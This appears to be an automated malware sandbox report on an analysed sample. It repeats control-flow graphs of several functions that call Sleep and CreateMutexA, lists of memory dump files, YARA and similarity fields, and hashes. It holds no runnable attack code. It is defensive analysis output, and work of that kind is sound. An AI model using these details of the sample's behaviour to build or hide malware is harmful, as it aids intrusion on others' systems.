                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: ae4b0cc54de43e772ab3b9fba859c8397feb385ba38588886f81e049274cdadc
                                                                                                                                                                                                • Instruction ID: 5602ffb2547ecb6ac55820c8756cfb785a081be1d7d11bee0644be1d01aefba1
                                                                                                                                                                                                • Opcode Fuzzy Hash: ae4b0cc54de43e772ab3b9fba859c8397feb385ba38588886f81e049274cdadc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 823128717042049BEB08DB78EE8DFADB7A2EBC1314F28921DE014B73D6D77689828751
                                                                                                                                                                                                Function 00EC9F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 207 ec9f44-ec9f64 211 ec9f66-ec9f72 207->211 212 ec9f92-ec9fae 207->212 213 ec9f88-ec9f8f call edd663 211->213 214 ec9f74-ec9f82 211->214 215 ec9fdc-ec9ffb 212->215 216 ec9fb0-ec9fbc 212->216 213->212 214->213 219 eca92b 214->219 217 ec9ffd-eca009 215->217 218 eca029-eca916 call ed80c0 215->218 221 ec9fbe-ec9fcc 216->221 222 ec9fd2-ec9fd9 call edd663 216->222 223 eca01f-eca026 call edd663 217->223 224 eca00b-eca019 217->224 226 eca953-eca994 Sleep CreateMutexA 219->226 227 eca92b call ef6c6a 219->227 221->219 221->222 222->215 223->218 224->219 224->223 236 eca996-eca998 226->236 237 eca9a7-eca9a8 226->237 227->226 236->237 239 eca99a-eca9a5 236->239 239->237
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: 599250ee6ddf29e50ae48851ff66cd3c5572935ef4856597d4ae096a31d805ec
                                                                                                                                                                                                • Instruction ID: 5d7d546d9028e7a9806ab81a0cab788345de99b2fc251d43221b1c59756f6939
                                                                                                                                                                                                • Opcode Fuzzy Hash: 599250ee6ddf29e50ae48851ff66cd3c5572935ef4856597d4ae096a31d805ec
                                                                                                                                                                                                • Instruction Fuzzy Hash: D0314C717041488BEB189B78DE8DBADB7A2EBC5314F28522DE014F73D6D73789828752
                                                                                                                                                                                                Function 00ECA079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 241 eca079-eca099 245 eca09b-eca0a7 241->245 246 eca0c7-eca0e3 241->246 249 eca0bd-eca0c4 call edd663 245->249 250 eca0a9-eca0b7 245->250 247 eca0e5-eca0f1 246->247 248 eca111-eca130 246->248 251 eca107-eca10e call edd663 247->251 252 eca0f3-eca101 247->252 253 eca15e-eca916 call ed80c0 248->253 254 eca132-eca13e 248->254 249->246 250->249 255 eca930-eca994 call ef6c6a Sleep CreateMutexA 250->255 251->248 252->251 252->255 259 eca154-eca15b call edd663 254->259 260 eca140-eca14e 254->260 271 eca996-eca998 255->271 272 eca9a7-eca9a8 255->272 259->253 260->255 260->259 271->272 273 eca99a-eca9a5 271->273 273->272
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: d1e71c08682fa6c54bcea470f4a9f6eeeba6113c8eea181ef5fb08301b05aa56
                                                                                                                                                                                                • Instruction ID: e07397a69268e6e692ee45a899053375ebd9210c3ba8c8539cfa26e7b91d0646
                                                                                                                                                                                                • Opcode Fuzzy Hash: d1e71c08682fa6c54bcea470f4a9f6eeeba6113c8eea181ef5fb08301b05aa56
                                                                                                                                                                                                • Instruction Fuzzy Hash: B93157717002088BEB089B78DE89B6DB762EBC1318F2C522CE014B73D5C73789828712
                                                                                                                                                                                                Function 00ECA1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 275 eca1ae-eca1ce 279 eca1fc-eca218 275->279 280 eca1d0-eca1dc 275->280 281 eca21a-eca226 279->281 282 eca246-eca265 279->282 283 eca1de-eca1ec 280->283 284 eca1f2-eca1f9 call edd663 280->284 285 eca23c-eca243 call edd663 281->285 286 eca228-eca236 281->286 287 eca267-eca273 282->287 288 eca293-eca916 call ed80c0 282->288 283->284 289 eca935 283->289 284->279 285->282 286->285 286->289 295 eca289-eca290 call edd663 287->295 296 eca275-eca283 287->296 292 eca953-eca994 Sleep CreateMutexA 289->292 293 eca935 call ef6c6a 289->293 304 eca996-eca998 292->304 305 eca9a7-eca9a8 292->305 293->292 295->288 296->289 296->295 304->305 307 eca99a-eca9a5 304->307 307->305
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                • Opcode ID: 5b6dbf0d7e468ba46a750e405a13e58d9596240c083bd8e19c5c97d1b80470f4
                                                                                                                                                                                                • Instruction ID: 6412693ac156c321d57b4b83808e6af9451f6bf32b7ea2aaa592e8a8a217c456
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6dbf0d7e468ba46a750e405a13e58d9596240c083bd8e19c5c97d1b80470f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: CD3137717002089BEB089B68DE89F6DB762EBC5318F28522DE014B73E5D73789828712
                                                                                                                                                                                                Function 00ECA418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 309 eca418-eca438 313 eca43a-eca446 309->313 314 eca466-eca482 309->314 315 eca45c-eca463 call edd663 313->315 316 eca448-eca456 313->316 317 eca484-eca490 314->317 318 eca4b0-eca4cf 314->318 315->314 316->315 319 eca93f-eca949 call ef6c6a * 2 316->319 321 eca4a6-eca4ad call edd663 317->321 322 eca492-eca4a0 317->322 323 eca4fd-eca916 call ed80c0 318->323 324 eca4d1-eca4dd 318->324 340 eca94e 319->340 341 eca949 call ef6c6a 319->341 321->318 322->319 322->321 329 eca4df-eca4ed 324->329 330 eca4f3-eca4fa call edd663 324->330 329->319 329->330 330->323 342 eca953-eca994 Sleep CreateMutexA 340->342 343 eca94e call ef6c6a 340->343 341->340 345 eca996-eca998 342->345 346 eca9a7-eca9a8 342->346 343->342 345->346 347 eca99a-eca9a5 345->347 347->346
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00ECA963
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00F23254), ref: 00ECA981
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
